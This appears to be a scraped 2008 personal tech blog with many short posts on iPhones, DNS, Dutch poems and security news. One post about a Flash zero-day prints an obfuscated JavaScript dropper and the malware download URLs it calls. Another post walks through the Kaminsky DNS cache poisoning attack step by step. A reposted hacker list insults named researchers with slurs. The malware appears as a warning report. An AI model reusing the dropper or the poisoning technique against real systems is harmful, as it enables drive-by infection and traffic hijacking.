Luckily there is an updated version of the E270 driver available for OSX, unfortunatly it is wrapped in a .EXE, sigh...

So much for using China products sold by the KPN.

Waardeloos

versleten ruggen

uitgebluste vuurtorens

gemankeerde meiers

droevige geeltjes

jammerlijke joetjes

verlopen vijfjes

kansarme knaken

zielige pieken

hongerende heitjes

snikkende stuivers

waardeloze centen

-- Emma Klage

GOOD NEWS: Cervelat-Krise passed!

Life saver: The Brazilian Zebu*-cow-intestine can be imported into Europe again.

After the bovine spongiform encephalopathy crisis it was verboten to import specific parts of the cows into Europe.

Since the Cervelat.CH needs the best available bowels for it's perfect curve & taste, only the Zebu's intestine can do. Thank G*d this is allowed again.

* Well actually it is more [5/8] Chanchim, but they look like Zebu.

Meester Boukema

als je niet buiten roken kunt
kunt je buiten roken

is fout

als U niet buiten roken kunt
kunt U buiten roken

is goed

The best things in life are free...

...but you can give them to the birds and bees, I want money!

How is that, you give away a kick ass front-end, secure IMAP & POP, more storage space then anyone and a near perfect service and everyone is silently using ad-blockers to prevent you from making money and you accept that. But when there is ONE DAY of availability issues with that kick ass service, people go ape shit and you even apologize!

I would like to thank the gmail team for exceeding all my expectations, consistently.

iPhone 2.0 but where is the...

..normal functions, like:

• SMS forwarding ?
• Copy & Paste ?
• MMS ?
• Video recording ?
• Blocking of unwanted phone calls ?
• Voice Recording ?

How come some hippy hackers can do all the cool stuff but Apple doesn't?

Even the PwnageTool looks better then iTimes FFS!

pdp's older mailbox volumes compromized, DUH!

The "Great Council of Internet Superheros" [internetsuperheros@hushmail.com] has compromized Petko D. Petkov [AKA pdp]'s, older mailbox RAR volumes and posted lots of it on RapidShare.

They threaten a whole bunch of people:

The Judge for Security Sellout Crimes hereby wages war against:

|/| Tom Ferris @ adobe.com security-protocols.com
|/| Matasano LLC @ matasano.com sockpuppet.org
|/| Nate Lawson @ rootlabs.com
|/| Joanna Rutkowska @ trannyvideos.com
|/| Petko D. Petkov @ googlemail.com gnucitizen.org
|/| Matt Richard @ idefense.com
|/| /\) Toralv Dirro @ mcafee.com AVERT Labs
|/|/\/ Dan Kaminsky @ ioactive.com arkham.wstn.ioactive.com
|/|\/ Dror Shalev @ sec.drorshalev.com
(\\\) Dragos Riuiu @ gaysecwest.com
(\\\) Thorsten Holz @ honeynet.org mwcollect.org
(\\\) Andre Protas @ eeye.com mwcollect.org (IDA leaker)
(\\\) Gadi Evron @ linuxbox.org kosherobese.org
(\\\) Valdis Kletnieks @ vt.edu & his alcoholic mother
/\\/\ Robert Lemos @ securityfocus.com
/ ,^./\ Ryan Naraine @ zdnet.com gmail.com
/ / \/\ Beyond Security @ Isreal, Gadi's bitch tits
/ / \/\ SecReview @ blogspot.com (gay reviews)
( ( )/) Juha-Matti Laurio @ netti.fi & Isreal (blog moron)
| | |/| Sergio Alvarez @ gmail.com nruns.com (AV rapist)
| | DIE |/| Theo de Raadt @ cvs.openbsd.org gaydate.com
| | |/| Alan Shimel @ yahoo.com stillsecure.com
( ( )/) Lance M. Havok @ dumb.lame.idiot.pl
\ \ / / kingcope/kcope @ gmx.net lame.idiot.de
\ `---' / Jennifer Granick @ whitefat.defender.lame
`-----' David Maynor @ gmail.com erratasec.com apple.com
Andrew Cushman @ microsoft.com gossip.sec

I wonder where this is going to end. Some big names here and I am sure not all will take it laying down. The compromise of pdp's account should warn people...

Andrea Pininfarina --- morte

On a Vespa [style] Andrea Pininfarina the CEO of the best car designing companies ever, has died.

He and his Vespa scooter collided with a Ford Fiesta[FFS] about 8:15 a.m. in Trofarello.

Andrea died, Vespa broke, Fiesta lives: where is the justice in this?

Never ever ever talk to the police

Do not trust me, trust someone who knows:



As an investigator, I can only agree: everything you say can and will be used against you. One of my most respected teachers on the subject taught me an other trick. It comes down to screaming 'I NEED HELP' and I will leave it to the reader to think up the context as in when the time has come to [ab-]use this.

Most people are not even aware that LYING is allowed in the process of interrogation...

Thanks Bruce

My TraceRoute for OSX?

Damn:

checking sys/xti.h presence... no
checking for sys/xti.h... no
checking for floor in -lm... yes
./configure: line 6742: syntax error near unexpected token `1.0.0,'
./configure: line 6742: ` AM_PATH_GTK(1.0.0, CFLAGS="$CFLAGS $GTK_CFLAGS"'

MyTraceRoute is a kick ass network connection 'debug' implementation that sends a sequence of ICMP ECHO requests to each hop to determine the quality of the link to each machine. As it does this, it prints running statistics about each machine.

iPhone:~ root# ./mtr --report www.google.com
HOST: iPhone Loss% Snt Last Avg Best Wrst StDev
1. 192.168.1.2 0.0% 10 2.0 9.6 1.9 72.4 22.1
[SNIP]
14. 12.88.155.14 66.7% 9 24.4 63.0 20.7 143.8 70.0
15. 216.239.48.110 87.5% 8 23.7 23.7 23.7 23.7 0.0
16. 66.249.95.149 25.0% 8 38.0 37.0 35.1 39.8 1.7
17. ??? 100.0 8 0.0 0.0 0.0 0.0 0.0
18. 209.85.253.161 14.3% 7 46.7 44.4 36.9 50.6 5.3
19. 74.125.47.104 85.7% 7 36.8 36.8 36.8 36.8 0.0

Simple, light & uses stuff we have been using for years, just a little better. The way I like it. It runs nicely on the iPhone, install it via Cydia, but for the love of cheese I can not compile it on my OSX Darwin MacBook.

Anyone?

Switzerland FTW!

1st of August is Switzerland's national day. On this day swiss people burn stuff, while speaking a funny language.
One of the two most beutifull countries in the world, in my book. And certainly the one country with the best possible implementation of a democracy.
They do not work to efficient, folowing Canada and being trailed by Trinidat & Tobago on the GDP list, but that makes it only extra pleasant to live there.
Today I wish all people with a @.CH email address a super nice day with many friends and even more fire!

Search and you will WHAT???

As much as I loved stumbling on google when it was starting up, as eager I have been finding even better engines.

It is amazing how difficult it is to build a better google. The latest attempt is called cuil and it too, fails.

I challance you to find anything. So far only the simplest of searches yields useable results. Like searching for linkedin actually gives www.linkedin.com as a first hit: well done. Searching for 'mokum von Amsterdam' give two pages of something I once posted on the Wired blog and that has been replicated 1.000 times on other sites: no link to this blog or anything usefull.

Try searching for 'ING bank' in google and in cuil. Tell me why on earth ING Poland & Timisoara show up in Cuil on page one? How on earth did these guys fill up their repository?

Altavista does better FFS! [as a matter of fact, altavista showed me a nice bar in Berlin I will visit next time around].

Lessons learned: stick to google, use altavista more often, wait till cuil grows up, if ever.

DE ONTVOERING

hun hebben zij
klaagt de klant tegen de kapper

hun hebben zij
is niet goed Nederlands, meneer
wist de knipper

zij hebben haar, meneer
zij hebben haar

-- Frans Engels

Why OpenDNS [if you can not run DJBDNS]

To test, I let DHCP update my resolve file with the DNS servers of my [horribly slow!] KPN Internet mobile connection:

bash-3.2# cat /etc/resolv.conf
nameserver 208.67.222.222
nameserver 208.67.220.220
nameserver 62.133.126.28
nameserver 62.133.126.29

The top two address are my 'normal' DNS entries, from the fine folks of OpenDNS [who where secure since day one].

Now let's check the DNS servers from both OpenDNS & KPN mobile with a simple dig:

bash-3.2# dig @208.67.220.220 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"208.69.34.6 is GOOD: 28 queries in 1061.8 seconds from 28 ports with std dev 17429.24"
bash-3.2# dig @208.67.222.222 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"208.69.34.4 is GOOD: 26 queries in 4.3 seconds from 26 ports with std dev 20231.33"

bash-3.2# dig @62.133.126.28 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"62.133.126.28 is POOR: 26 queries in 4.2 seconds from 1 ports with std dev 0.00"
bash-3.2# dig @62.133.126.29 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"62.133.126.29 is POOR: 26 queries in 4.2 seconds from 1 ports with std dev 0.00"

Of course, nothing beats djbdbs, but for day today use, OpenDNS p0wnserz your provider's DNS hands down.

To keep your resolve.conf file save and clean on OSX and prevent DHCP from updating it, set the immutable bit:
chflags uchg /var/run/resolv.conf
To remove the flag use:
chflags nouchg /var/run/resolv.conf

CloudTablet or CloudPannel?

Interesting idea over at TechCrunch: a simple, US$200 WebTablet, running FireFox & Skype.

For me this is the ultimate CloudPannel [zero hits ATM], or CloudTablet [less then 350 hits ATM], whatever you prefer.

I would like 5 or 10 laying around the house for easy web 2.0 access!

DNS issues released

The cat is out of the bag. Yes, Halvar Flake figured out the flaw Dan Kaminsky will announce at Black Hat.

1.

Pretend for the moment that you know only the basic function of DNS — that it translates WWW.VICTIM.COM into 1.2.3.4. The code that does this is called a resolver. Each time the resolver contacts the DNS to translate names to addresses, it creates a packet called a query. The exchange of packets is called a transaction. Since the number of packets flying about on the internet requires scientific notation to express, you can imagine there has to be some way of not mixing them up.

Bob goes to to a deli, to get a sandwich. Bob walks up to the counter, takes a pointy ticket from a round red dispenser. The ticket has a number on it. This will be Bob’s unique identifier for his sandwich acquisition transaction. Note that the number will probably be used twice — once when he is called to the counter to place his order and again when he’s called back to get his sandwich. If you’re wondering, Bob likes ham on rye with no onions.

If you’ve got this, you have the concept of transaction IDs, which are numbers assigned to keep different transactions in order. Conveniently, the first sixteen bits of a DNS packet is just such a unique identifier. It’s called a query id (QID). And with the efficiency of the deli, the QID is used for multiple transactions.

2.

Until very recently, there were two basic classes of DNS vulnerabilities. One of them involves mucking about with the QID in DNS packets and the other requires you to know the Deep Magic.

First, QIDs.

Bob’s a resolver and Alice is a content DNS server. Bob asks Alice for the address of WWW.VICTIM.COM. The answer is 1.2.3.4. Mallory would like the answer to be 6.6.6.0.

It is a (now not) secret shame of mine that for a great deal of my career, creating and sending packets was, to me, Deep Magic. Then it became part of my job, and I learned that it is surprisingly trivial. So put aside the idea that forging IP packets is the hard part of poisoning DNS. If I’m Mallory and I’m attacking Bob, how can he distinguish my packets from Alice’s? Because I can’t see the QID in his request, and the QID in my response won’t match. The QID is the only thing protecting the DNS from Mallory (me).

QID attacks began in the olden days, when BIND simply incremented the QID with every query response. If you can remember 1995, here’s a workable DNS attack. Think fast: 9372 + 1. Did you get 9372, or even miss and get 9373? You win, Alice loses. Mallory sends a constant stream of DNS responses for WWW.VICTIM.COM. All are quietly discarded —- until Mallory gets Bob to query for WWW.VICTIM.COM. If Mallory’s response gets to your computer before the legitimate response arrives from your ISP’s name server, you will be redirected where Mallory tells you you’re going.

Obvious fix: you want the QID be randomly generated. Now Alice and Mallory are in a race. Alice sees Bob’s request and knows the QID. Mallory has to guess it. The first one to land a packet with the correct QID wins. Randomized QIDs give Alice a big advantage in this race.

But there’s a bunch more problems here:

• If you convince Bob to ask Alice the same question 1000 times all at once, and Bob uses a different QID for each packet, you made the race 1000 times easier for Mallory to win.

• If Bob uses a crappy random number generator, Mallory can get Bob to ask for names she controls, like WWW.EVIL.COM, and watch how the QIDs bounce around; eventually, she’ll break the RNG and be able to predict its outputs.

• 16 bits just isn’t big enough to provide real security at the traffic rates we deal with in 2008.

Your computer’s resolver is probably a stub. Which means it won’t really save the response. You don’t want it to. The stub asks a real DNS server, probably run by your ISP. That server doesn’t know everything. It can’t, and shouldn’t, because the whole idea of DNS is to compensate for the organic and shifting nature of internet naming and addressing. Frequently, that server has to go ask another, and so on. The cool kids call this “recursion”.

Responses carry another value, too, called a time to live (TTL). This number tells your name server how long to cache the answer. Why? Because they deal with zillions of queries. Whoever wins the race between Alice and Mallory, their answer gets cached. All subsequent responses will be dropped. All future requests for that same data, within the TTL, come from that answer. This is good for whoever wins the race. If Alice wins, it means Mallory can’t poison the cache for that name. If Mallory wins, the next 10,000 or so people that ask that cache where WWW.VICTIM.COM is go to 6.6.6.0.

3.

Then there’s that other set of DNS vulnerabilities. These require you to pay attention in class. They haven’t really been talked about since 1997. And they’re hard to find, because you have to understand how DNS works. In other words, you have to be completely crazy. Lazlo Hollyfeld crazy. I’m speaking of course of RRset poisoning.

DNS has a complicated architecture. Not only that, but not all name servers run the same code. So not all of them implement DNS in exactly the same way. And not only that, but not all name servers are configured properly.

I just described a QID attack that poisons the name server’s cache. This attack requires speed, agility and luck, because if the “real” answer happens to arrive before your spoofed one, you’re locked out. Fortunately for those of you that have a time machine, some versions of DNS provide you with another way to poison the name server’s cache anyway. To explain it, I will have to explain more about the format of a DNS packet.

DNS packets are variable in length and consist of a header, some flags and resource records (RRs). RRs are where the goods ride around. There are up to three sets of RRs in a DNS packet, along with the original query. These are:

• Answer RR’s, which contain the answer to whatever question you asked (such as the A record that says WWW.VICTIM.COM is 1.2.3.4)

• Authority RR’s, which tell resolvers which name servers to refer to to get the complete answer for a question

• Additional RR’s, sometimes called “glue”, which contain any additional information needed to make the response effective.

A word about the Additional RR’s. Think about an NS record, like the one that COM’s name server uses to tell us that, to find out where WWW.VICTIM.COM is, you have to ask NS1.VICTIM.COM. That’s good to know, but it’s not going to help you unless you know where to find NS1.VICTIM.COM. Names are not addresses. This is a chicken and egg problem. The answer is, you provide both the NS record pointing VICTIM.COM to NS1.VICTIM.COM, and the A record pointing NS1.VICTIM.COM to 1.2.3.1.

Now, let’s party like it’s 1995.

Download the source code for a DNS implementation and hack it up such that every time it sends out a response, it also sends out a little bit of evil — an extra Additional RR with bad information. Then let’s set up an evil server with it, and register it as EVIL.COM. Now get a bunch of web pages up with IMG tags pointing to names hosted at that server.

Bob innocently loads up a page with the malicious tags which coerces his browser resolve that name. Bob asks Alice to resolve that name. Here comes recursion: eventually the query arrives at our evil server. Which sends back a response with an unexpected (evil) Additional RR.

If Alice’s cache honors the unexpected record, it’s 1995 —- buy CSCO! —- and you just poisoned their cache. Worse, it will replace the “real” data already in the cache with the fake data. You asked where WWW.EVIL.COM was (or rather, the image tags did). But Alice also “found out” where WWW.VICTIM.COM was: 6.6.6.0. Every resolver that points to that name server will now gladly forward you to the website of the beast.

4.

It’s not 1995. It’s 2008. There are fixes for the attacks I have described.

Fix 1:

The QID race is fixed with random IDs, and by using a strong random number generator and being careful with the state you keep for queries. 16 bit query IDs are still too short, which fills us with dread. There are hacks to get around this. For instance, DJBDNS randomizes the source port on requests as well, and thus won’t honor responses unless they come from someone who guesses the ~16 bit source port. This brings us close to 32 bits, which is much harder to guess.

Fix 2:

The RR set poisoning attack is fixed by bailiwick checking, which is a quirky way of saying that resolvers simply remember that if they’re asking where WWW.VICTIM.COM is, they’re not interested in caching a new address for WWW.GOOGLE.COM in the same transaction.

Remember how these fixes work. They’re very important.

And so we arrive at the present day.

5.

Let’s try again to convince Bob that WWW.VICTIM.COM is 6.6.6.0.

This time though, instead of getting Bob to look up WWW.VICTIM.COM and then beating Alice in the race, or getting Bob to look up WWW.EVIL.COM and slipping strychnine into his ham sandwich, we’re going to be clever (sneaky).

Get Bob to look up AAAAA.VICTIM.COM. Race Alice. Alice’s answer is NXDOMAIN, because there’s no such name as AAAAA.VICTIM.COM. Mallory has an answer. We’ll come back to it. Alice has an advantage in the race, and so she likely beats Mallory. NXDOMAIN for AAAAA.VICTIM.COM.

Alice’s advantage is not insurmountable. Mallory repeats with AAAAB.VICTIM.COM. Then AAAAC.VICTIM.COM. And so on. Sometime, perhaps around CXOPQ.VICTIM.COM, Mallory wins! Bob believes CXOPQ.VICTIM.COM is 6.6.6.0!

Poisoning CXOPQ.VICTIM.COM is not super valuable to Mallory. But Mallory has another trick up her sleeve. Because her response didn’t just say CXOPQ.VICTIM.COM was 6.6.6.0. It also contained Additional RRs pointing WWW.VICTIM.COM to 6.6.6.0. Those records are in-bailiwick: Bob is in fact interested in VICTIM.COM for this query. Mallory has combined attack #1 with attack #2, defeating fix #1 and fix #2. Mallory can conduct this attack in less than 10 seconds on a fast Internet link.

----

On a side note: can stuff no longer published but found in google's cache be copyrighted?

Geotagging iPhone gone bad :(

Great feature: geotagging the images taken with the iPhone [already the most Popular Cameraphone on Flickr].

Just imagion that you take photos during the holiday and all you need to do is dump them in, say, google earth and all pics are shown in the correct location. Right, that was the plan. Unfortunatly Apple made a couple of errors with the implementation, again.

The UIImagePicker application that is used when you email a photo from the iPhone, strips out the EXIF location data, DUH! iPhoto mutilates [strips the "Ref" tag] the EXIF geodata when resizing photos, DUH.

So what you get is third party apps that sort-of-help, like AirMe. It will upload the photo to Flickr and geotag it, but then you have to take the pic with AirMe and have NO geodata stored in the EXIF data of the photo at all, and that is bad.

Who knows, maybe if Apple would put a little less invain effort in the locking down of the iPhone they'd be able to get MMS working? Some more features in the camera? Geotagging stored correctly? How difficult is that? How come 17 year old's CAN do that but a multi bilion company can't?
Photo source

Italians...

Good thief's maybe, but crooks. Living with mama till >30. Not being able to clean their own rubbish. Lovely, but lousy cars makers. And so on.

To wrap it up, even in the IT world they show up. And the pain got a name: Zibri. A thief, but then in code.

Read this to get an idea about this crook:

The following opinions are mine, and not those of the DevTeam as a whole, although many members agree with me:

Free thoughts...

There's something that's been on my chest for a while, and it's been bothering others on the team as well. The name of this particular thorn in our sides begins with the letter Z and ends with "ibri". Yes, I'm sure all of you are rolling your eyes at the "drama" we hacker "kids" are stirring up, but I'm sure if you had your work taken without permission, you would feel the same way. It's particularly galling that he is still spreading FUD on his blog in an attempt to save face. I'm going to try to address some of them in this post.

Zibri implies that our jailbreak is not "real", saying instead that our release is a "software upgrade, total internat [sic] firmware modification and custom firmware".

For him, a "real hack" works in a few minutes because it only needs to modify a few bytes here and there.

When Pwnage 1.0 was released, it was indeed the ultimate hack for the iPhone/iPod Touch. Never before had the devices been under the user's control from the very bottom up. Prior, less sophisticated jailbreaks were still subject to the whims of the kernel, which couldn't be modified because the bootloader checked its signature and refused to boot if it was incorrect.

Back in those days, the definition of "hack" above was still a feasible one, as the chain of trust ended at the kernel. Once you gained write access to the root filesystem, you could run arbitrary programs and make patches at will to many system components. Indeed, many such patches were needed, to make activation allow unapproved SIM cards, and to make Springboard display unauthorized apps.

Fast forward back to the present, and you'll see the situation has changed. Solutions that using a ramdisk simply made a change or two to the filesystem now must contend with the mighty kernel's signature checking of all installed apps and libraries. Mounting the root filesystem and modifying /etc/fstab to make it writable is quite alright, but the moment you make patches for activation or anything else, the kernel will refuse to run the modified programs, unless you can somehow steal Apple's private signing key. Furthermore, such a jailbreak would be essentially useless because the system would refuse to run any of your custom software (such as Installer.app or Cydia), again because of the lack of signatures on it.

Given the above situation, it becomes clear that if you want to use 2.0 for anything but screenshots, you either need to get ahold of Apple's signing key (start preparing your army now) or you need to patch the 2.0 kernel. Hard as we tried, we couldn't find much of an army, so we took the latter approach.

We adapted our Pwnage technique to the 2.0 firmware, using a new unreleased exploit that we'd been keeping to ourselves, in the hope that Apple wouldn't patch it. This allows us to cut the signature checks out of the device bootloaders, allowing us to remove signature checking from the kernel, and enabling you to run all the custom software and patches you please.

Please note other than my facetious army suggestions, patching the bootloaders is the _only_ way to get a functional jailbreak for 2.0. Under the aforementioned definition of "real hack", there is no such thing as a "real hack" for 2.0. I hope you agree with me by now that Pwnage, the exploit it uses, and its subsequent obliteration of the device's chain of trust, is a "real hack".

More FUD is spread by this undying rumor of "Palladium" (or TPM) being used fully on Apple's devices, making it impossible for you "to play online with legit buyers." This is nothing but uninformed nonsense, and while there is the potential for some definition of trusted computing on iPhone and iPod Touch, Apple is not using it, and they have no way to remotely distinguish your pwned device from a legitimately activated one. This should have been obvious from our examples of running App Store applications next to our custom ones, but "obvious" is a very relative term.

On an unrelated note, I and the others take issue with Zibri's definition of open source. No, Linux distributions are not stealing, but our work was not released as open source, with any kind of permissive license, so the open source he brings into the discussion is entirely irrelevant. He took our work, our private exploits (such as the unreleased one we were able to use for Pwning 2.0), and without our permission (trying to defame us with fake comments, no less) used them in his work, that he made significant amounts of money on. He did this not by selling "his work", but by portraying himself as the reasonable "dev" who fought against the tyranny of the dev team and Apple, and requesting donations to his "cause" (recall his older iphone-elite.googlecode.com and his self-righteous bashing of the dev team for accepting donations; funny how principles change). Furthermore, with his millions of hits and occasionally obscene ads, he made his site into a complete money machine. So although he did not sell our work, it is more than fair to say that he made plenty of money from it.

And as to his most recent update, I'm not really sure what to say. I'd call it the swan song, but that would imply he was a swan, which is certainly not my intention. Maybe the chicken song would be more appropriate. ZiPhone was "developed" 9 months after the iPhone release, so he's justifying his lack of releases now, okay. Once again he pushes the "real hack" idea, which we hope we've already pounded sufficiently into the ground above. We're not sure how the fact that we were so popular it took down multiple unmetered gigabit servers is a point in his favor. We've had close to a third of his total visits since last week.

I want to dedicate a special paragraph to something that's been bugging us for a while, too. The myth that ZiPhone never harmed a phone. Certainly, we all know that iPhones are almost impossible to brick, but flashing unmatched fls/eep pairs to the baseband is plain irresponsible on Zibri's part. Does he not care about messing up phones, or does he simply not know better? And the laughable WiFi fix he released for issues that he called "user error" (actually a consequence of the above design choice) where he unconditionally set every ZiPhone WiFi MAC address to 0:Z:i:b:r:i? How did he expect that to work? It doesn't take a networking genius to figure out that two such phones on the same network would cause havoc, and indeed it did.

The following few "facts" on his blog are just more FUD. Our tools can't kill iPhones, because the only way to kill an iPhone through software (and even then just the radio) is to flash an incomplete image as the S-Gold bootloader. Apple cannot remotely kill pwned iPhones because as I mentioned earlier, it has no way to detect which iPhones are pwned.

I'm not sure why he goes on to say that you should be satisfied with Apple's AppStore. It certainly contains many good programs, but to quote Zibri just a couple of weeks earlier:

As of today you will have 2 choices:
1) Believe in the community and don't upgrade to 2.0
2) Say goodbye to Installer and freedom and upgrade.

So are you suggesting we say goodbye to freedom now? I guess we can't expect much from someone who made a reputation for himself by denouncing the devteam for accepting donations (not even soliciting them) and who now has a website full of ads, exhortations to donate, and very little content? Now we have given you a nice opportunity to upgrade to 2.0, use the AppStore _and_ use community apps. If he really wanted the good of the community, why is he not recommending it?

I would normally just ignore his entries, but as many still look at Zibri as an authority in the scene, I felt the need to dispel some of the FUD he was spreading, and finally denounce his pathetic attempts to stay relevant. Posting the latest root filesystem key after we release PwnageTool? PwnageTool exposes all the keys right within its plist files. And if he knew about the DFU exploit all along, as he implies, why didn't he take advantage of it? We would like to see him write up an article on how it all works, just to prove that Zibri knows all.

Thank you for your patience reading this. We will continue working hard on providing quality hacks and software, but please, to anyone who's tempted, stop spreading bullshit about us and our work. source

How big is your I-EGO?

My I-EGO is pretty big, people tell me. But how big is it really? Time to find out!

Enter your name & domain and let the www.egosurf.org do the rest.

My 'mokum von Amsterdam' EGO is a mere 4700 points but I am sure your's a lot bigger :P

Shabat shalom!

I just text to say...

I would like a pile of these, right next to the complaint & request notes.


A big pile so I could formalize & incorporate the process in my daily live.


Now who would deserve one signed by you?

We are ING!

Shht!

BattleField 2: new patch 1.5 and 3 new maps

It is still secret, the current internal BETA for the long awaited BF2 1.5 patch is currently running in Spain and guess what:

3 new maps will be released with it [act of G*d clause applies].

The names of the maps I cannot reveal but there will be at least one _you_ will like :P

Queing for the iPhone 2.0

In Rotterdam there is a [modest] queue for the T-Mobile shop that will start selling the iPhone 2.0 from 00:00 sharp.

500 phones are available to those that have no friends, no home, no sex and no lust for beer.

Mine will fall out of the air real soon now, but I can not say I am half as tense as I was with the iPhone orginal a year ago.

SSH scanning on the rise. DENYHOSTS

DenyHosts blocked 44 new ssh user scanning hosts in the last 13 hours. That is a lot.

Normally days with >5 new hosts caught by my lone sensor are remarkable, it happens not more often then 4 times a month. This month has been truly busy however. July 1st 10 new addresses, July 3rd 14, where in the whole month of June there where 2 days with >5 [6 & 8 on the 28th & 30th. A busy month globally] with a grant total of 28 for the whole month.

Nothing advanced either, like the botnet-like scanning in May.


This is for those hosts who made it to the largest blacklist of all times.

My users are smarter then yours!

1. Firefox 221 56.81%
2. Internet Explorer 123 31.62%
3. Safari 34 8.74%
4. Opera 8 2.06%
5. Mozilla 2 0.51%
6. Netscape 1 0.26%

Google's Street View spycar clocked in Amsterdam, Holland

I think this is a first: a google car in Amsterdam. Photo taken on the 1st of July 2008 in Amsterdam, on the Gaasperdammerweg, Amsterdam after I picked up the car coming out of the Huigenbos [I know, all these streets do not sound like Amsterdam... but it is, techincally speaking].


Grotere kaart weergeven

In a year or so you can see me doing silly :P

I should have...

...written about our first meeting, where you said "Vroeger was ik een lekker stuk" and I took a photo of your legs that looked good, not to say great.

I should have written about the conversations we had.

I should have written about the nail biting, before and during the football game.

I should have because the moments mattered to me.

I should have because now they took you, after your screaming alarmed the neighbor, after your neighbor alarmed the police, after the police kicked in the door, after the police warned the ambulance, after the ambulance took you away, after the police took your cellphone, after the doctors called that after the first operation they saw little hope, and after I tried to contact your daughter, and after the second call from the doctors who said there was little hope and after that I found your daughter was informed... but all was too late.

All was too late, but disaster, 'cause it was too early. It should not have been.

Kiek, I should have...

Danke viel...

Photo taken on Monday the 23rd of June. Someone 'forgot' something :P

BackTrack3 to be released, RSN

And they do it again: the final release of BackTrack 3 will hit the net any moment now.

Ever since I met Max at some stint at a client, I have been impressed with his bright mind and unbelievable control over the matters he works on. He did an assesment of the wlan setup I had designed and he pinpointed the weaknesses [some publicly known, others, well 'new'] and the strong points which maked up a nice report for management.

Anyway, BT3 is about to hit the tubes soon and now you know first :P

Reasons why I do...

Add high-speed wireless data to the hottest kid on the block and me being regularly in Amsterdam with a keyboard within reach...

So this couple look a good reason to spend a couple of euroos :D

Reasons I do not.

Firefox 3 is about to het the Internet tubes in a couple of hours. Great, or is it?

The fact that Google Browser Sync project is not taking calls nor displaying any word about support of their essential FF extention for FF 3 has made me decide to NOT upgrade.

As much as I liked test driving FF3 [all beta's and RC's] I just do not want to browse without GBS, unless I am given no option.

So here is my appologies to the FireFox 3 team: sorry! But I will retreat my pledge to download FF3 untill GBS is available and will continue to use FF2.

Here's the google teams reply:

Thanks for trying out Google Browser Sync and for all of your feedback. It was a tough call, but we decided to phase out support for Browser Sync. Since the team has moved on to other projects that are keeping them busy, we don't have time to update the extension to work with Firefox 3 or to continue to maintain it.

For those of you who want to continue to use Firefox 2, we'll maintain support for old versions of Google Browser Sync through 2008. After that, we can recommend a few other products that scratch a similar itch. We hope that one of them works for you:

Mozilla Weave [labs.mozilla.com] from Mozilla Labs—Offers bookmark and history synchronization across computers.

Google Toolbar for Firefox [toolbar.google.com]—Store your bookmarks online and access them from any computer online.

Foxmarks Bookmark Synchronizer [addons.mozilla.org]—Synchronizes your bookmarks across all computers where it is installed.

Regards,
The Google Team

But personally I do not want to change too much at a time so I will sit back, enjoy GBS for the comming couple of months, wait till FF3's bugs will be ironed out and then, maybe, switch away from GBS to one of the above mentioned 'replacements'.

This is sweet :D

"AuthSight uses your Mac's iSight camera to take snapshots of the nut behind the keyboard whenever an invalid password is entered, either at login or in a screensaver. AuthSight can also (optionally) email photos to you."

Get it here. Thank Zac Bedell.

Flash: the format everybody loves to hate [at least should]

Prime time for our beloved FLASH player again: a 0-day has been actively exploited the last couple of days, as reported by Security Focus, SANS, Adobe knows not much more ATM. Served as a file with the jpg extention, that is actually a script:

http://www. play0nlnie. com/pcd/topics/ff11us/20080311cPxl31/07.jpg

window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
eval(function(p,a,c,k,e,d){e=function(c){return(ce(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){2.3(\'A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M#1a=4,0,19,0" l="0" m="0"
16="Z">\');2.3(\'<8 7="R" a="Q"/>\');2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.
c"/>\');2.3(\'<8 7="N" a="O"/>\');2.3(\'<8 7="S" a="#T"/>\');2.3(\'\');2.3(\'\')}W{2.3("")}}',62,73,'||document|write||expires|http|name|param|com|value|
20080311cPxl31|swf|ff11us|pcd|topics|www|play0nlnie|playon|60|indexOf|
width|height|if|src|07|cookie|object|msie|toLowerCase|d27cdb6e|11cf|96b8|ae6d|
userAgent|clsid|classid|1000|setTime|Date|var|new|getTime|444553540000|
toGMTString|path|Yes|navigator|cab|quality|high|movie|sameDomain|allowScriptAccess
|bgcolor|ffffff|08|EMBED|else|embed|codebase|middle|shockwave|cabs||pub|macromedia
|download|align|flash|swflash||version'.split('|'),0,{}))

That in the end, downloads:
http://www. play0nlnie. com/ax.exe
&
http://www. play0nlnie. com/setip.exe

Virustotal was 7/31 for ax.exe, and 7/31 for setip.exe earlier this evening.

Google gives a cool 359 results for the quoted string "Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability" so word's out.

Arun Sarin is leaving Vodafone

What a pitty!

We lost the most out of touch CEO ever who's ideas, visions and quotes where always mindbending.

gmail filter multiple domains

For sometime I have been wondering about how to implement my own idea of a zero inbox, and at the same time keep my filters in gmail clean and mean.

It took me a couple of searches to find the answer. It's simple:
You can separate the domains|names with a vertical bar '|' but not with a comma or the 'OR' operator. Well, actually you can use the good old 'OR' clause but then you need to use the '(' and ')' like so:

